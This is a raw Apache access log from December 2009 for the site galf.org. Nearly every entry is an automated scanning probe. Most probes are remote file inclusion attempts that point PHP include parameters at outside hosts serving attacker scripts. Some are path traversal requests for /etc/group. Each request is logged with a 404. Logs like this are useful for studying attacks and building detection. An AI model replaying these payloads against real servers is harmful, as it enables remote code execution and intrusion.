72.37.199.41 - - [20/Dec/2009:16:29:56 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.225.106.11 - - [20/Dec/2009:16:30:12 -0800] "GET /logs/access_090601.log/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.225.106.11 - - [20/Dec/2009:16:30:12 -0800] "GET /!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.225.106.11 - - [20/Dec/2009:16:30:12 -0800] "GET /logs/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.225.106.11 - - [20/Dec/2009:16:30:54 -0800] "GET /logs/access_090622.log/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
65.55.207.94 - - [20/Dec/2009:16:32:14 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.205.53.98 - - [20/Dec/2009:16:33:58 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.53.98 - - [20/Dec/2009:16:33:58 -0800] "GET /logs/access_091012.log//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.53.98 - - [20/Dec/2009:16:33:58 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:16:35:39 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:16:35:39 -0800] "GET //skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:35:40 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:35:40 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:35:40 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:35:45 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.1.253.1 - - [20/Dec/2009:16:36:02 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.1.253.1 - - [20/Dec/2009:16:36:02 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.1.253.1 - - [20/Dec/2009:16:36:02 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:16:36:35 -0800] "GET /logs/access.log///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:37:13 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:37:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:37:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:37:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [20/Dec/2009:16:37:13 -0800] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [20/Dec/2009:16:37:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [20/Dec/2009:16:37:18 -0800] "GET /port.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:37:18 -0800] "GET /port.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
203.197.196.10 - - [20/Dec/2009:16:37:46 -0800] "GET /playing.php/common/db.php?commonpath=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
203.197.196.10 - - [20/Dec/2009:16:37:46 -0800] "GET /logs//playing.php/common/db.php?commonpath=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
151.1.253.1 - - [20/Dec/2009:16:38:07 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:16:38:10 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:16:38:10 -0800] "GET /logs/access_091123.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:16:38:10 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:29 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:34 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:34 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:41 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:51 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:56 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:38:56 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:16:38:59 -0800] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:16:38:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:16:38:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:01 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:16:39:08 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:16:39:08 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:16:39:08 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:16:39:13 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:16:39:13 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:16:39:14 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:16:39:29 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:37 -0800] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:37 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:47 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:47 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:39:47 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:16:40:32 -0800] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [20/Dec/2009:16:40:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [20/Dec/2009:16:40:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:16:41:06 -0800] "GET /logs/access_090608.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:16:41:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:16:41:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:16:41:13 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:16:42:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:16:42:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:16:42:32 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:16:42:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Dec/2009:16:42:32 -0800] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [20/Dec/2009:16:42:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:16:42:33 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.225.106.11 - - [20/Dec/2009:16:42:44 -0800] "GET /logs/access.log///veiw.php?pg=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
195.225.106.11 - - [20/Dec/2009:16:42:44 -0800] "GET //veiw.php?pg=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
195.225.106.11 - - [20/Dec/2009:16:42:44 -0800] "GET /logs///veiw.php?pg=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
202.122.19.24 - - [20/Dec/2009:16:43:42 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [20/Dec/2009:16:43:42 -0800] "GET /logs/access.log%20%20///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [20/Dec/2009:16:43:42 -0800] "GET /logs/access_091109.log%20%20///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:16:43:44 -0800] "GET //skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:16:46:18 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:46:19 -0800] "GET /main.php?link=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:46:19 -0800] "GET /main.php?link=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:16:46:38 -0800] "GET //skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [20/Dec/2009:16:46:44 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:46:44 -0800] "GET /logs/access_091123.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:46:44 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:16:46:45 -0800] "GET /logs/access_090608.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [20/Dec/2009:16:47:16 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.166.171.183 - - [20/Dec/2009:16:49:07 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.166.171.183 - - [20/Dec/2009:16:49:07 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.166.171.183 - - [20/Dec/2009:16:49:07 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.166.171.183 - - [20/Dec/2009:16:49:54 -0800] "GET /logs/access_091123.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:50:14 -0800] "GET /logs/access_090706.log//common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:50:14 -0800] "GET /common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.69.40.227 - - [20/Dec/2009:16:50:14 -0800] "GET /logs//common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:51:15 -0800] "GET /logs/access_090608.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:51:18 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.1.253.1 - - [20/Dec/2009:16:51:21 -0800] "GET /logs//common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.1.253.1 - - [20/Dec/2009:16:51:21 -0800] "GET /common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.1.253.1 - - [20/Dec/2009:16:51:21 -0800] "GET /logs/access_090706.log//common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:16:51:34 -0800] "GET /main.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:16:51:34 -0800] "GET /logs/main.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:16:51:35 -0800] "GET /main.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:16:51:35 -0800] "GET /logs/main.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:16:54:51 -0800] "GET /logs/access_090706.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:01 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:01 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:01 -0800] "GET /logs/access_091109.log%20%20/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:07 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:07 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:07 -0800] "GET /logs/access_091109.log%20%20/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:13 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:13 -0800] "GET /logs/access_091109.log%20%20/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:13 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
